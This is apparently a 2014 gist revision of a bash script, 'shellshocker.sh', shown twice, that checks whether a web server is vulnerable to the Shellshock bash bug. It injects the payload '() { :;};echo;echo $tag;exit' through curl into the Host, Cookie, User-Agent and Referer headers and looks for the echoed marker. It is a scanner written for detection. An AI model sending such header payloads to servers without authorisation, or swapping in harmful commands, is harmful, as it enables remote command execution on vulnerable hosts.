panzi · September 25, 2014 15:15
diff --git a/shellshocker.sh b/shellshocker.sh
 #!/bin/bash

 url="$1"
 tag=`uuid`
 payload="() { :;};echo;echo $tag;exit"
 vulnerable=0

 function shellshock () {
 	header="$1"
 	response=`curl --header "$header: $payload" --silent --insecure "$url"`

 	if [ $PIPESTATUS -ne 0 ]; then
 		echo "error connecting to $url" >&2
 		exit 1
 	elif [[ "$response" == *$tag* ]]; then
 		echo "vulnerable header: $header"
 		vulnerable=1
 	fi
 }

 for header in Host Cookie User-Agent Referer; do
 	shellshock "$header"
 done

 if [ $vulnerable -eq 0 ]; then
 	echo "server seems to be unaffected"
 else
 	exit 1
 fi
	#!/bin/bash

	url="$1"
	tag=`uuid`
	payload="() { :;};echo;echo $tag;exit"
	vulnerable=0

	function shellshock () {
	header="$1"
	response=`curl --header "$header: $payload" --silent --insecure "$url"`

	if [ $PIPESTATUS -ne 0 ]; then
	echo "error connecting to $url" >&2
	exit 1
	elif [[ "$response" == $tag ]]; then
	echo "vulnerable header: $header"
	vulnerable=1
	fi
	}

	for header in Host Cookie User-Agent Referer; do
	shellshock "$header"
	done

	if [ $vulnerable -eq 0 ]; then
	echo "server seems to be unaffected"
	else
	exit 1
	fi